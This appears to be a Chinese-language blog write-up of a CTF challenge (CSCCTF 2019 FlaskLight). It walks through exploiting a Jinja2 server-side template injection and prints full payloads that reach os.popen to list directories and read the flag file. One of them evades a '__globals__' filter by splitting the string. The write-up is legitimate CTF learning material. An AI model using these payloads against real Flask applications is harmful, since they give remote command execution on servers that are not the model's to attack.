Title

[CSCCTF 2019 Qual]FlaskLight 1|SSTI注入

1、打开之后查看源代码信息,发现提示信息,结果如下:

2、根据提示输入参数进行测试,payload:?search={{2*2}},结果如下:

3、确定了注入点之后那就获取下系统目录,payload:?search={{"".__class__.__mro__[2].__subclasses__()[71].__init__[%27__globals__%27][%27os%27].popen("ls").read()}},结果返回错误,结果如下:

4、猜测是过滤了__globals__,那就尝试拼接一下,payload:?search={{"".__class__.__mro__[2].__subclasses__()[71].__init__[%27__g%27+%27lobals__%27][%27os%27].popen("ls").read()}},成功获取到目录信息,结果如下:

5、读取下flasklight目录,payload:?search={{"".__class__.__mro__[2].__subclasses__()[71].__init__[%27__g%27+%27lobals__%27][%27os%27].popen("ls%20/flasklight").read()}},结果如下:

6、读取下coomme_geeeett_youur_flek(come_get_you_flag)文件,差点没看出来,payload:?search={{"".__class__.__mro__[2].__subclasses__()[71].__init__[%27__g%27+%27lobals__%27][%27os%27].popen("cat%20/flasklight/coomme_geeeett_youur_flek").read()}},成功获取到flag信息,结果如下:



如果您觉得阅读本文对您有帮助,请点一下“推荐”按钮,您的“推荐”将是我最大的写作动力!欢迎各位转载,但是未经作者本人同意,转载文章之后必须在文章页面明显位置给出作者和原文连接,否则保留追究法律责任的权利。
posted @   upfine  阅读(139)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· Manus的开源复刻OpenManus初探
· 三行代码完成国际化适配,妙~啊~
· .NET Core 中如何实现缓存的预热?
· 如何调用 DeepSeek 的自然语言处理 API 接口并集成到在线客服系统
点击右上角即可分享
微信分享提示